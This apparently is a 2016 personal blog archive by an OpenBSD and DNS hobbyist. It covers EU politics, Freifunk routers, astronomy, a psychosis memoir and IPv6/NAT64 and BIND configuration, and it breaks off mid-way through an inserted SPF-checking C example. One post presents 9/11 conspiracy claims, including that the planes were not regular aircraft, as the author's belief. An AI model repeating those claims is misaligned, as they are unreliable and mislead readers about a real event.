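    // Only requests carrying a valid signature made with "home-gw" are
    // answered; unsigned queries from the Internet are refused, so the
    // box is not an open resolver.
    allow-query     { key "home-gw"; };
    allow-recursion { key "home-gw"; };
};

// ==== named.conf on the home gateway ====
// Sign every request sent to the remote recursor with the shared key.
server 192.0.2.53 {
    keys { "home-gw"; };
};

options {
    recursion yes;
    forward only;                       // never fall back to unsigned lookups
    forwarders { 192.0.2.53; };
    // LAN clients talk to the gateway unsigned; only the hop across
    // the Internet is authenticated. 10.0.0.0/24 is an assumed range.
    allow-recursion { 127.0.0.1; 10.0.0.0/24; };
};
```

Run `named-checkconf` on each side before reloading. TSIG authenticates the queries and answers but does not encrypt them, so an observer on the path can still read the names being looked up.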



Energiewende in Danger

June 10th, 2016

Germany's transition to green energy is in danger from shifting policies in government. One argument is that they think that we're overproducing electricity, so I have an idea. We could create hydrogen with excess electricity and sell it to Iceland via ships. The ships sail back via Norway (empty) and fill up with natural gas and then return to Germany. It's a sort of triangle trade (without slaves), but with substances that require high pressure. Also we could use hydrogen locally until there is no more need to export it to Iceland. Think about it! Makes perfect sense.

Here are some links:



Most cannot see the milky way

June 12th, 2016

This article talks about light pollution. Light pollution affects 80% of global population. I've never completely seen the milky way. But I have vivid memories of seeing a lot of stars in northern Ontario, or even in northern Saskatchewan.



Received seven Freifunk Routers

June 18th, 2016

Here is a (bad) photo of two of them:

I'm going to be using 6 of these for networking my neighbourhood. Not going to say much more than that because I'm dealing with the details but it's likely to go down mid August.



June Solstice in 3 days

June 20th, 2016

On Thursday is solstice. Happy festivities honoring your summer or winter gods (depending where you are on earth). In the northern hemisphere the sun will shine directly down at a 90 degree angle at the Tropic of Cancer. There is probably a story of Ptolemy (sp) who discovered that the sun shone straight down a well or cave in ancient Egypt.



Happy Summer!

June 21st, 2016

Since I screwed up last post (solstice was yesterday) I want to wish you a happy turn of the seasons. It's summer here in Germany. Happy summer!



Good bye Britannia

June 24th, 2016

The UK voted leave yesterday. Congrats for a large voter turnout. The pound dropped to a 30 year low against the dollar, and that isn't all. The UK is not part of the big three anymore and not part of the big four. There will be unneeded hardships for everyone and if the UK wants to come back into the EU there will be such a leashing back that it won't be worth it for them. That's my outlook on this. I guess we pick up the pieces from here. The new big three in the EU are Italy, France and Germany. The fourth country in the EU to be part of the big four is Spain. I'm sad but relieved a decision has fallen. Now we'll close the border to English soccer fans too hopefully. What has gone down in France is a shame regarding the violence of soccer fans.



Idea Brainstorming for Britain

June 24th, 2016

So after Brexit, what can Britain do? I kinda feel sorry for them, so I'm gonna talk about some ideas. There is the commonwealth. With Canada and Australia there is potential for 120 million people being united globally. There are ideas of hyperloops going from Canada to Scotland, there are movies that have a tunnel go past the center of the earth to create a link between England and Australia. Also scram-jet technology is talked about and tested in Australia. Also you don't have to look all that far, Norway is quite interested in what's happening. With Britain, Norway and Iceland a triangle Atlantic union could form. In times of ocean mining ideas perhaps there is stuff one can take out of the ocean bed inside the triangle. I do feel however that Britain has lost backing and a voice in the world. It is now a small island nation and needs to look around a world that is continually uniting to grasp market share and quality of life.



EU, something must change!

June 25th, 2016

The EU has to draw consequences from Brexit. Something must change. Let the British leave not be in vain, their sacrifice should better us all. Let's work for the people for example and less for political bureaucracy. I always thought that the EU for a first attempt at managing a large union and doing so democratically was doing fairly well, but we can do better. We also must become friendlier with southern EU states. Less exploitation, more subsidizations. We're all humans first and foremost, and EU citizens should experience a similar quality of life no matter where in the union they may be. We must strive for this. I know some think that this will be hard on their wallet. But think about the lost opportunities when more countries leave. That'll work contra to the progress we've all been making together.



I hunt sysadmins

June 25th, 2016

The Five Eyes nations' spy agencies have no more obligation to protect EU citizens. They can now hunt sysadmins inside the EU with impunity due to UK leaving EU. All those sysadmins operating in the EU should be aware that this could result in sabotage or 0wnage. But don't get hysterical or anything. Snowden told us this is happening, and we find ourselves on the other side suddenly.



Ordered books from Amazon

June 26th, 2016

I have ordered a set of 4 books from Amazon. Donald Knuth's Art of Computer Programming volumes 1-4. I count this as one book though in my list of a dozen books per year. I'm happy to be receiving these by Thursday.



Changes at $HOME

June 29th, 2016

I'm doing changes to my home computers due to a startling discovery. I believe my Macbook Pro is hacked or so. So I'm going to put OpenBSD on it in due time. It's sort of a brexit of my own doing, avoiding Mac OS X and the vmware'ed Windows 10 on the MBP. I don't need these totalitarian OS's and I won't ever go on to Mac OS Sierra. I never liked the Apple announcement. It is too privacy inhibiting. So I'm going to OpenBSD. It's open source, I can look under the hood, and it's supposedly secure and functional. Most of my network gear is OpenBSD so I don't mind this decision at all. Fallout? Yes there is fallout. I have a Numark DJ mixer that worked with DJ Pro software on the Macbook Pro that I won't have a replacement for on OpenBSD. Since I'm a monkey with mostly everything I don't think an OpenBSD driver and software for the mixer will get written, if ever. So I needed the Windows 10 on the MBP until today as I have installed Ubuntu on a netbook of mine (the second Acer) and it does all the features I need with Java, luckily. Plus I only need it once a month or so for work. Anyhow before I become too incoherent I'm gonna keep this short. Just want to let you know!



The missing link

July 2nd, 2016

In the region I live there are job ads. People want to hire. Yet there are no people that can fill those positions. I have been working in IT since I was 21, so 19 years ago was when I started working. Back then I came from a short stint at college where I did not graduate, but I did manage to gather up a few college credits. Here are a few other people who did not graduate from post-secondary education:

  • Steve Jobs - Apple
  • Sir Richard Branson - Virgin Atlantic
  • Larry Ellison - Oracle

So it can be said that these people beat the odds of getting somewhere after not completing university. I have always thought that I'm capable of similar. When I started work after college, I started investing in books, of technical nature and to this day I follow a budget of around twelve books a year in order to shape up and make up for knowledge that I did not have the time or patience to learn. These books are often pretty good, but sometimes they are disappointing as well. Where I live we have no technical bookstores so I'm forced to take a chance with buying from online retailers. So how does this all fit together? Job ads? Work experience? Famous people? What I'm trying to say is that the positions of work advertised do not reflect my skills which are highly specialized in the UNIX field. There is a missing link.

I have the power to write tools, or use tools from other people, to apply these on problems that are imposed on other people. However when someone wants a Windows admin I'm helpless. I did take a course in Windows once but as time progressed and I focused on UNIX I lost that knowledge. It's how they say "use it or lose it". So what I'm saying is the people who post these job ads should make inroads to allow other tools to help with their problems. Simply put "I'm looking for a windows admin that knows AD" sounds a lot like "As an investor I've bought into Microsoft's promise to make me money and I want a serf to fulfill that dream for me". Well I'm no serf. And some of these job ads I've seen on the market for quite some time, they aren't getting filled. It's almost as if these people have no direction and just look up any formula found somewhere in Redmond, Washington that promises to give them money. It's a dead end. That's the missing link.

Opportunity is created when people do inroads. When they hoist others on their shoulders, not when they have some formula for making money and want a robot/serf to do the work as outlined. Creativity feeds opportunity. As much as you want to surround yourself with scientists you're missing the big picture unless you also stick an artist in the midst. The artist plays with unknown things that intrigue the scientists and gives them passion to aim higher. In much the same way I am an artist working with computers, inhibit my creativity with my tools and nothing will progress and it's a terrible waste. I also do research. I write on a DNS server. Who can say that about themselves? In this region? I scoff at those people who scoff at that. The research, the artistic expression of interpreting an RFC, is what should drive an IT person forward. What, out of ideas? Write an SMTP server, write any server you have a problem with in order to figure it out and better yourself and better humanity. I am totally prepared to fill the missing link and do a good job of it.



Being Freifunk Active

July 4th, 2016

This morning I distributed 47 letters to neighbours making them aware of freifunk.net and offering them a deal on how they can get freifunk routers from me for free. I'm hoping the response will be positive and we'll be able to mesh-network the entire apartment complex. So far I have invested 165 EUR in this and there will be a bit more to pay for my neighbours. I'm having a lot of fun with the planning of this so far.



EU could be un-democratic

July 5th, 2016

There are all sorts of political slyness going around continental Europe. There is talk of "not letting Britain leave". To me that's a wrong move as the British have voted "leave" and that should be respected. Let's not make a farce of democracy here! Because it will rattle our cage, and perhaps more than that. It's funny how some people think they can outdo the numbers of a referendum, for personal gain.



It's not me

July 13th, 2016

The recommendations of youtube to me are not me. Whether illuminati, flat earth, greys, aliens, crop circles, future, past, reggae, hip hop, tupac, sports illustrated cover girls, tagesschau news, conspiracy theories, you name it, it isn't me. I don't even know why I watch this trash, as there is little quality found on youtube. There is no relationship between ancient Egypt and the pyramid on the dollar bill. Should there be? Please! Get real! Perhaps you never heard of american pyramids? OK time to educate yourself. Look for maya pyramids. And I believe that's just the tip of the pyramid of pyramids that existed on earth. Relationship between pyramids and stars? It's possible, I don't know. This is a message to possible AIs interested in what is really me. Not my google profile that's for sure.



Ordered two books

July 15th, 2016

I have ordered two books.

  • IPv6 Socket API Extensions: Programmer's Guide - Li, Qing
  • IPv6 Essentials - Hagen, Silvia

I have read some of Qing Li's books before; I'm looking forward to this one. Silvia Hagen's book is new to me, hopefully not a disappointment.



My Stargate

July 18th, 2016

I had a vision tonight how I can "weave" a stargate. It requires two pairs of 3 rings where there are entangled atom pairs. The idea is based on a few theoretical / non-proven assumptions. A pair of entangled atoms cannot be "crossed" by another pair of entangled atoms. That's hope #1. And entangled atoms can be safely stored in spacetime in some medium while entangled. That's hope #2.

As you can see in the video it waves/knits 1 mesh which lies on top of a set of 15 (or more/less) entangled atoms. When the fabric is tight enough a wormhole will form. Pretend the rings are like ball bearings there can be a door in the middle disallowing vacuum to enter, or atmosphere to exit. Otherwise it would be like pulling the plug of a bathtub, your atmosphere would be teleported to space and be gone.

My personal use of this device is to build a space station with a microsat. The microsat has the remote end and positions itself in a lagrange point. Then you create the wormhole/tunnel and feed it more objects such as more robots that build from their own material (perhaps steel) a torus/wheeled space station. Once that's done bigger tunnels can be made and eventually it would have to be so big to fit me through it. Then I'd be leaving you all to live on my torus at L5.



Sick of it

July 19th, 2016

A wave of terror is sweeping the area. Yes. I've been indoctrinated to it. And I can't stand it. What I hate the most is respectable newspapers that I had respect for, literally feeding the flames. They posted a picture of a terrorist with a knife, to twitter. Too bad that terrorist was shot dead by police this morning. So what's the point of showing us his ugly face? It's over! Nothing to see here!



The WTC conspiracy

July 22nd, 2016

Where was I when the WTC airplane bombings happened? I was at home, in my apartment in Toronto, sleeping in. I also didn't have a TV (thank goodness) so I wasn't able to play CNN or other news outlets to the full media coverage as others. So as time progressed away from point zero, I became more and more interested in the conspiracy theories. In the meantime I got a TV again. At first I wasn't able to see through it but the more I watched the more there were questions, such as:

  • Why did WTC building 7 implode?
  • Why did the falling of the WTC towers look like a controlled implosion?
  • Why was there a lot of cabling being laid in the WTC before September 11th?
  • Why did the wingtips of the airplanes slice the side of the WTC towers like butter? Without breaking off... aluminium vs. steel you take your pick.
  • Eye witnesses said it was a dark plane not like described by the media
  • At what speed did the planes hit the towers? Because top speed is only achieved at 36,000 feet

There are other factors that I'm not listing because I can't remember them in detail but they were all good. If you want to see them read up on 9/11 debunks on youtube.

So my conclusion to this is either a) a conspiracy, or b) an outer space alien conspiracy. Now b seems likelier than a because people naturally talk. When you look back 15 years so much has happened because of this event there is no turning back the clock. So we gotta live with that. However I can say with a clear conscience that I do not believe that those were regular planes that flew into the WTC towers on September 11, 2001.



Quitting Twitter tomorrow at noon

July 22nd, 2016

I'm not content with this social network. It robs my time. So I'm leaving it. I have said my formal goodbyes to the few people that I know on there. So this is the second social network I'll be leaving after facebook. I don't see how people like these so much. I'll still however be posting to this blog. I have more control on this blog over what people see and archive. If I was discontent with that I'd be closing the blog too, but I'm not.



Media blackout of SZ.de yesterday

July 23rd, 2016

During the terrorist attack of Munich the Munich newspaper sueddeutsche.de did not work for up to 2 hours. I don't know if they were ddos'ed, couldn't handle the load of so many people looking for information, or were told by anti-terror police to stay offline. We'll never know. Today I'm leaving twitter, I think I'm gonna wrap this up earlier than noon. Good riddance.



Finally quit Twitter

July 23rd, 2016

Well I've done it. I clicked deactivate my account. 8 months of time wastage. While I was there I also cleared my cookie history and browsing history from the beginning of time. This was actually all under "browsing history" in chrome.



Did you know: DoS report law

July 24th, 2016

When you're an ISP or similar network in Germany that is under DoS, there is a law that you must report it to the government? No shitting you! Meldepflicht. So if you're a source of dos yourself and you get dosed you can't vigilante back really.



Freifunk Project fail

July 30th, 2016

I had a project to give 6 routers to my neighbours. I sent them a letter asking them whether they would like to do this, and I'd do a lottery which neighbour in which house would get a router. All in all I intended to invest 220 euros per neighbour that gets a router, but it didn't work. They must have thought it was a scam. In the picture you see the red dots, that's where my project would have been, but now I have 6 spare routers for freifunk franken that I want to get rid of/sell. I guess mesh networks don't interest people that aren't exactly technology freaks. It's a bit too bad.



If I were to vote in the US Election today

August 2nd, 2016

I'd vote Jill Stein of the US Green Party. Perhaps lesser known than the GOP candidates, but the Green Party has been around a long time (if Ralph Nader tells you anything). However there are always accusations by the GOPs that parties like the Greens take away the winning vote, I wouldn't let that deter me. I'd vote who I want to vote for not to vote someone else out. Democracy is about pro choice not anti choice. At least it should be so.



Ordered 4 books

August 5th, 2016

I ordered 4 books, something different from computer (programming).

  1. Fundamental Astronomy - Hannu Karttunen et al.
  2. Physics Book - Clifford Pickover
  3. The Math Book - Clifford Pickover
  4. Star Names: Their Lore and Meaning - Richard Allen

I hope these books will give me a bit of peace of mind, a distraction from the otherwise computer life that is starting to bore me (a little). I picked the math book for its pictures in the preview on Amazon. I hope it's worth it. Physics book interests me too, and Astronomy has always been on the horizon of interesting things for me.



O Really? Do we really need NATO?

August 5th, 2016

I'm gonna keep it short. A Turkey that's a dictatorship within NATO doesn't fit. A Britain "defending" the EU doesn't work. The continued mission in Afghanistan serves only the Afghani security situation, o really? What we need is a military alliance within the EU and only the EU. Some politicians have already made that call. But keep NATO as the non-EU countries (America, Canada, Britain, Norway), do with Turkey what you wish, it wouldn't be part of the EU anymore.



DSL: A question I've always wondered

August 5th, 2016

I've always wondered what takes more electricity, a DSL modem or a Fibre Optic Transceiver. If a DSL modem or even VDSL takes up a lot of electricity then it's a waste, and should be replaced with fibre optic transceivers.



Psychosis: put to the test (my first psychosis)

August 5th, 2016

When I had my psychosis in Ottawa and Toronto, I didn't have too many opportunities to hurt others. Even though I hated everyone around me, I was curious to find the source of my delusions. I rode my bike a lot to find the source which would have looked like a bunch of vampires and behaved like succubi. As my psychosis continued over time the worse shape I was in. I started throwing pennies at limousines as they were driving past me in Toronto. It was a good thing that I did not have access (opportunity) to a firearm. Would I have used it? I don't know. Psychosis puts you to the test on what person you are.

When that guy at the hostel knocked on my forehead and said "this is what you're doing to me" and implying that I was somehow knocking on his forehead with my thoughts which I believe I was trying to do, I realised that this guy was out to screw me over. He meddled with my mentally weakened and delusional state. And I hated him. Had I a gun I might have shot him down. Instead I went out with my bike and tried to forget the incident.

I'm glad that's the way I reacted because I am not a violent person. I did see a few weird things. Like the Chinese American lady at the hostel who must have shone a blue LED into her eye because her left eye was lit blue. She tried to screw with my mind too. She asked me several times, "what do you know?". I drew blank. Later I went with her for a walk around Ottawa's parliament she said I was very stressed but did not say I should get help. Perhaps she was afraid. I think I might have rode my bike into the backyard of 24 Sussex Drive but it was open (the gates). And somehow I ended up on the Ottawa River anyhow so I think it was just a parkette.

What else was weird. Oh yes as I was biking around a car stopped at a traffic light and the driver opened the door and dropped something. A piece of paper. After the car left (there weren't many cars on the road) I went to pick up that paper and it had a number of 5 or 6 digits on it. I drew blank again. I was sure that it was a psychological trap to see if I'd pick it up. Someone else was watching. But who? Anyhow I managed to do most things by myself but it was increasingly difficult. The horror that something was terribly wrong with me was causing tension inside me, I tried to relax. I started drawing on paper with crayons and I did this at the airport when I left Canada that time. Being able to leave the situation, the weird people, my delusions, my fears. I tried to imagine that Canada was infested by vampires (part of my psychosis) and that Europe was full of wolves based on a British guy's wolf tattoo that I saw at the hostel in Toronto.

Somehow being away gave me comfort but I was still delusional. I was home, but in a strange land (hadn't been a resident of Germany for 15 years prior), and I agreed to psychiatric counselling and treatment after some time. I don't know why I needed to write this now but it's for all those that have a psychosis and those who don't become violent as me. Luckily I had an escape like I was told, but escapes are only needed when your situation has no more routes to go. It should be noted I visited Canada after that twice, and I don't think it's infested by vampires anymore luckily. This is also for Glen Race, who I just read about in the Toronto Star.



New self-portrait of me

August 9th, 2016

This is me in 2016. A bit fatter than the previous years, a bit smarter perhaps too. Although I heard that fat people have brains of skinny people 10 years older than them. So I'm not really smart.. but wise.

I just made this photo actually and touched it up with several tools, cut by gimp.



less surveillance

August 15th, 2016

I have lessened the surveillance on my blog by disabling a javascript pinger. This leaves the javascript ads that I have and I'm working on disabling those too. Basically my goal is to make it so that people can read my webpage once and have the page idly sit in their browser without it doing any traffic in the background (which reveals to me and any third party that the browser is still on my site).



My all-prime angled triangles

August 16th, 2016

I thought about this tonight and figured it out with the help of a small shell script. There are only 6 possible triangles of this kind in the universe. I have listed them in a picture below.

They look like shards. And are different sizes, the ratio of sizes I didn't mind because I got the images from an online triangle calculator.



The Panic Chronicles

August 19th, 2016

I have started the "panic chronicles" a blog-like bug report on what can go wrong on OpenBSD. As I find bugs I'm sure to write them here.

Enjoy.



Eleven Reasons to be excited about the future of Technology

August 19th, 2016

Slashdot wrote this. I'd like to add my own opinion whether I'm excited or not.

  1. Self-Driving Cars - worry me. A car is a weapon when misused.
  2. Clean Energy - we're not there yet and will we ever be?
  3. Virtual and Augmented Reality - used to excite me, but the devices are locked down to only work on proprietary systems. Who wants to go pokemon go hunting anyhow? Do we really need this in our lives?
  4. Drones and flying cars - hmm. cool. When I still lived in .ca this would be cool to make the "suburbs" 700 km northwards, here in .eu it doesn't really matter since everything is settled land.
  5. Artificial Intelligence - would be cool to have it answer my VOIP phone and weed out voip spammers. Could it weed out my e-mail spam?
  6. Pocket Supercomputers for Everyone - with choice of OS or programmability?
  7. Cryptocurrencies and Blockchains - I don't even know what that is
  8. High-Quality Online Education - This is cool, however "da man" knows what you're currently being taught. Playing hooky?
  9. Better food through science - if it's tastier why not?
  10. Computerized Medicine - if I swallow a "smart" pill that releases its dose at the right moment that could be beneficial. Similarly nano-robots could be inserted into the blood stream, if that's possible I want virtual reality to watch it go..
  11. A new space age - yeah yeah.. where are our torus space stations that were in Stanley Kubrick's 2001 A Space Odyssey? Missions to Jupiter? HAL 9000's? oh we actually got the HAL, it's called Watson

Think I'm a bit pessimistic today.



Delphinusdnsd: Next week selfathon

August 22nd, 2016

I'm going on holiday for a week next week. I'm going to solely program on delphinusdnsd to get it in a state where I would be in a better position with it. On the menu is dd-convert.c to replace the ruby script. If I get time beyond that I'll work on making the dns keys rolloverable. Oh well good luck to myself.



Ordered a Banana Pi R1 Routerboard + Case

August 22nd, 2016

I ordered this at roughly 100 EUR. The power supply says it can deliver 2 Amps at 5V meaning 10 watts. If this is true and if OpenBSD runs on this I'm going to replace my i386 firewall that currently sucks 20 watts. I'll just have to try it out I guess. If I don't get OpenBSD on it there is probably a chance to run another UBO on it, or I could donate it to a developer. Will have to see.



OpenBSD 6.0 Poster arrived

August 24th, 2016

I have hung up this poster where the 5.8 poster was. I notice it's somewhat crooked.

This puts my office into a darker hue. Which suits the onclosing winter season.



The whereabouts of HD164595 in Hercules

August 30th, 2016

Slashdot made me aware of this story of a SETI signal that was observed last year by a Russian SETI installation.

I have plotted the rough area of HD164595, it's somewhere in the circle, but what's important is the relative nearness to the star Vega. It's in the constellation Hercules, and should be visible this summer with telescopes. As far as aliens reacting to broadcasts from Earth they have just now received signals from the 1920's because they are 95 light years away. However they might have been reacting to carbon in our atmosphere due to the start of the industrial revolution in the 1800's. Meaning the aliens have telescopes. It is hypothesized that they are a Kardashev scale I civilization if they are directing this towards only us, so they are more advanced than us.

May they keep the signal going with the strength of Hercules :-).



I had photographed Vega and Constellation Hercules

August 30th, 2016

This picture is from June 27th, 2010 so a little over 6 years ago. My dad and I were on the Peterstirn which is outside of Schweinfurt (the city that I live in). This article is in relevance to the last article and I wanted to show it again. I have made a cut-off from the original RAW Photo and I want to show you this. Feel free to open the photo in another tab to make it its original size.

As you can see this area of the sky (at least in june) is visible. You just gotta know what to look for. If you can find Vega you can find constellation Lyra and from there the area that's circled which is part of Hercules. Inside the circle somewhere lies the star system that emanates an 11 GHz signal.

Update. I have added the label to a star I think is called Ras Alhague in the constellation Ophiuchus. Constellation Hercules goes further up from here but I don't have that in my photo.



One more panic chronicle entry

September 9th, 2016

I woke up today to a panic'ed router/gateway. What a way to start the day. backtrace here. Why am I not sending these to OpenBSD anymore? dunno. I remembered there was a reason once.



TLS for centroid.eu blog, when?

September 14th, 2016

I'm going to restructure the website and the blog probably after the OpenBSD 6.1 release. Apparently there is a program in that release that manages certificates from "let's encrypt". Since I'd want my whole website encrypted I'd have to use let's encrypt several times to fully encrypt my website which contains the domains virgostar.net, solarscale.de and centroid.eu. So if you think the obfuscation is good enough, don't let it fool you, it was made for a defense against bots (that don't know javascript) not to thwart spying eyes. I'd run the same blog software only inside TLS with let's encrypt. Props have to be given to Edward Snowden for his whistleblowing which caused organizations like "let's encrypt" to form in the first place. Encryption should be free!



Stand up for Snowden

September 14th, 2016

There is a website called "pardon Snowden". It asks you to sign a petition to US President Barack Obama to pardon Edward Snowden before he leaves office. At the time of this writing Obama still has 128 days in office. Think about what Snowden's chances are after Obama? Would Trump pardon him? Would Hillary Clinton? Would anyone else? Edward Snowden's whistleblowing, which caused him to flee the USA and take up asylum in Russia, caused US citizens no harm and did them a favour in showing how out of hand the surveillance programme in the USA has become. Stand up for your rights by signing the petition! I tried but realised it has to be a US citizen. What sort of a world are we living in anyhow?



Equinox in two days

September 20th, 2016

Equinox is upon us again in two days. Last year's equinox was on the 23rd of September and it was chilly in the morning at 10 Celsius. Right now as I write this it's 16 Celsius and I'm hoping I can keep the heat off another week. We'll see.



Ordered a book from Amazon

September 20th, 2016

This time I want to learn more about USB. So I got:

  • USB Complete: The Developer's Guide (Complete Guides) - Jan Axelson

Hopefully it was worth it.



My IPv6 setup at M-net (german provider)

September 27th, 2016

I recently added IPv6 functionality to my network and had some obstacles to overcome, such as:

  1. How to route deep into my network and assign each host an IP6 that is 2 hops deep.
  2. What to do about rfc1918 IP's, since I want a NAT64/DNS64 setup
  3. How to do NAT66 in order to use deep routes

Well to give you a better idea I'm going to show you my network plan:

Network map:

[gaia]--                    [raspberry pi]
          \                      |              [mercury]
[phone1] - \                     |                  |
            --- [uranus] === [Access Point] --- [gamma] ---- to pppoe cloud
[phone2] - /                    ||
          /                     ||
[beta]--                        ||
                             [venus]-+--[spica]
                                |   \
                                |    +--[fritzbox LTE]------- to LTE network
                                |
                             [freifunk]

Legend:                         Hosts:

--- CAT5 cabling                gaia + spica: apple computers running vmware
=== wifi 5 Ghz                  uranus: OpenBSD i386 on Lanner hw
||  wifi 5 Ghz                  venus: OpenBSD amd64 on Soekris hw
                                gamma: OpenBSD amd64 on PC Engines APU
                                fritzbox: AVM fritzbox router

Here is my dhcp6c.conf file:

keyinfo mnet {
        realm "v6.mnet-online.de";
        keyid 1 ;
        secret "***notshown***";
};

interface pppoe0 {
        send ia-pd 0 ;
        script "/etc/nat66-up.sh";
};

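id-assoc pd {
        prefix-interface vether0 {
                sla-id 1 ;
                sla-len 0 ;
        };
};

and with that the /etc/nat66-up.sh script:

#!/bin/sh
# Run by dhcp6c (the "script" line in dhcp6c.conf above).

# Last inet6 address listed on vether0.
ADDRESS=`/sbin/ifconfig vether0 | grep inet6 | tail -1 | awk '{print $2}'`
# Build the /64 network string from the leading groups of that address.
NETWORK=`echo $ADDRESS | awk -F: '{printf("%s:%s:%s:%s:%s:%s::/64\n", $1, \
	$2, $3, $4, $5, $6); }'`

# Replace the contents of the pf table nat66 with the current network.
/sbin/pfctl -t nat66 -T flush
/sbin/pfctl -t nat66 -T add $NETWORK

exit 0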

I use a vether0 dummy ethernet interface to take on the IPv6 address from my provider (mnet) so that I can give all other interfaces a 2001:db8::/56 address. This address gets translated later in my pf rules and the relevant lines to the pf look like this:

table  persist
table  const { 2001:db8::/56 }
...
match out on $ext_if inet from  to any nat-to ($ext_if)
match out on $ext_if inet6 from  to any nat-to  round-robin \
	sticky-address
...
pass in on re2 inet6 from any to 64:ff9b::/96 af-to inet from ($ext_if)
pass in on re1 inet6 from any to 64:ff9b::/96 af-to inet from ($ext_if)

I would have liked putting (vether0:network) in place of the <nat66> but found that it translated to the fe80:: address and not the assigned address from m-net. So I have to do it this way, it's no headache. Also the round-robin was unfortunately the only mode I got working, I would have liked to use random to get a random IP6 on the outgoing /64.

So let's see what we got, we have native IPv4 NAT44'ed, we have dual-stack IPv6 NAT66'ed and we have NAT64/DNS64 on top of that. It's really cool, to show you how the DNS64 works I'm gonna do a host lookup on censored.net which isn't mine so please look at it just as an example:

beta$ host censored.net
censored.net has address 72.52.4.91
censored.net has IPv6 address 64:ff9b::4834:45b
censored.net mail is handled by 0 localhost.

Then when I route into 64:ff9b::/96 it gets af-to'ed in the pf rules to an IPv4 address. It's really cool.

What else is missing? I want to show you the DNS setup with BIND from the OpenBSD 6.0 ports, it worked out of the box. Here is what I had to add into the options:

        dns64 64:ff9b::/96 {
                clients { 2001:db8::/56; 192.168/16; };
                mapped { !10/8; !192.168/16; !172.16/12; any; };
                exclude { 64:ff9b::/96; };
                recursive-only yes;
        };

That's really all there is to it, I had a lot of fun doing this and can't wait until some services of mine use IPv6 so that I can drop the native IPv4 completely.
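How the 64:ff9b::4834:45b answer in the lookup above comes about, as an added example that is not part of the original post or of BIND/pf: the resolver appends the 32-bit IPv4 address to the /96 prefix, skips the private ranges negated in the mapped list, and the NAT64 side reverses the step. The function names are made up for this illustration.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The NAT64 prefix 64:ff9b::/96 used in the post (first 96 bits). */
static const unsigned char NAT64_PREFIX[12] = {
	0x00, 0x64, 0xff, 0x9b, 0, 0, 0, 0, 0, 0, 0, 0
};

/* Networks negated in the post's "mapped" list: 10/8, 172.16/12, 192.168/16. */
static const struct { uint32_t net, mask; } UNMAPPED[] = {
	{ 0x0a000000u, 0xff000000u },
	{ 0xac100000u, 0xfff00000u },
	{ 0xc0a80000u, 0xffff0000u },
};

/* Return 1 if this A record address must not be turned into an AAAA. */
static int is_unmapped(const struct in_addr *a)
{
	uint32_t h = ntohl(a->s_addr);
	size_t i;

	for (i = 0; i < sizeof(UNMAPPED) / sizeof(UNMAPPED[0]); i++)
		if ((h & UNMAPPED[i].mask) == UNMAPPED[i].net)
			return 1;
	return 0;
}

/*
 * DNS64 side: write the synthesized AAAA text for an IPv4 address.
 * Returns 0 on success, -1 for bad input or an address excluded from mapping.
 */
int dns64_synthesize(const char *ipv4, char *out, size_t outlen)
{
	struct in_addr a4;
	struct in6_addr a6;

	if (inet_pton(AF_INET, ipv4, &a4) != 1 || is_unmapped(&a4))
		return -1;
	memcpy(a6.s6_addr, NAT64_PREFIX, 12);      /* upper 96 bits: prefix */
	memcpy(a6.s6_addr + 12, &a4.s_addr, 4);    /* lower 32 bits: IPv4   */
	return inet_ntop(AF_INET6, &a6, out, (socklen_t)outlen) ? 0 : -1;
}

/*
 * NAT64 side: recover the IPv4 destination from an address inside
 * 64:ff9b::/96. Returns -1 if the address is outside the prefix.
 */
int nat64_extract(const char *ipv6, char *out, size_t outlen)
{
	struct in6_addr a6;
	struct in_addr a4;

	if (inet_pton(AF_INET6, ipv6, &a6) != 1 ||
	    memcmp(a6.s6_addr, NAT64_PREFIX, 12) != 0)
		return -1;
	memcpy(&a4.s_addr, a6.s6_addr + 12, 4);
	return inet_ntop(AF_INET, &a4, out, (socklen_t)outlen) ? 0 : -1;
}

int main(void)
{
	char buf[INET6_ADDRSTRLEN];

	if (dns64_synthesize("72.52.4.91", buf, sizeof(buf)) == 0)
		printf("72.52.4.91 -> %s\n", buf);
	if (dns64_synthesize("192.168.1.10", buf, sizeof(buf)) != 0)
		printf("192.168.1.10 is not mapped\n");
	if (nat64_extract("64:ff9b::4834:45b", buf, sizeof(buf)) == 0)
		printf("64:ff9b::4834:45b -> %s\n", buf);
	return 0;
}
```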



Victim of spoofed Mail

September 30th, 2016

I've become a victim of spoofed mail. Someone is sending mail with one of my domains to other people, getting them mad, and I receive the bounces. I do have SPF protection records but if the remote SMTP gateways don't enforce SPF records, then it's not helping. Here are the IPs that a "valid" mail from my domains would come from:

108.61.211.139
78.47.14.22
2a01:4f8:d13:1980::/64
2001:19f0:6c00:9041:5400:ff:fe11:3332

This is listed in SPF DNS records for my domains as well. I knew there were a-holes on the Internet, and they finally got to me. Unfortunately there is nothing I can do about this. If there is let me know what. I'm looking for a technical solution.
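What an enforcing receiver does with those four entries, as an added example that is not part of the original post: it walks the SPF record left to right and compares the connecting IP against each ip4:/ip6: mechanism. The record text is constructed from the addresses listed above and the trailing -all is an assumption; only ip4, ip6 and all are handled, and the function names are made up.

```c
#define _DEFAULT_SOURCE   /* strtok_r() on glibc */
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum spf_result { SPF_NONE, SPF_NEUTRAL, SPF_PASS, SPF_FAIL, SPF_SOFTFAIL };

/* Constructed record: the post's addresses, "-all" assumed. */
const char *SAMPLE_SPF =
    "v=spf1 ip4:108.61.211.139 ip4:78.47.14.22 ip6:2a01:4f8:d13:1980::/64 "
    "ip6:2001:19f0:6c00:9041:5400:ff:fe11:3332 -all";

/* Compare the first `bits` bits of two addresses. */
static int prefix_eq(const unsigned char *a, const unsigned char *b, int bits)
{
	int full = bits / 8, rem = bits % 8;
	unsigned char mask;

	if (memcmp(a, b, (size_t)full) != 0)
		return 0;
	if (rem == 0)
		return 1;
	mask = (unsigned char)(0xff << (8 - rem));
	return (a[full] & mask) == (b[full] & mask);
}

/* Does "addr[/len]" from an ip4:/ip6: mechanism cover the client address? */
static int mech_matches(int af, const char *arg, const unsigned char *client)
{
	char tmp[64], *slash, *end;
	unsigned char net[16];
	long bits = (af == AF_INET) ? 32 : 128, max = bits;

	if (strlen(arg) >= sizeof(tmp))
		return 0;
	strcpy(tmp, arg);
	if ((slash = strchr(tmp, '/')) != NULL) {
		*slash = '\0';
		bits = strtol(slash + 1, &end, 10);
		/* reject "/", "/abc" and out-of-range lengths instead of matching */
		if (end == slash + 1 || *end != '\0' || bits < 0 || bits > max)
			return 0;
	}
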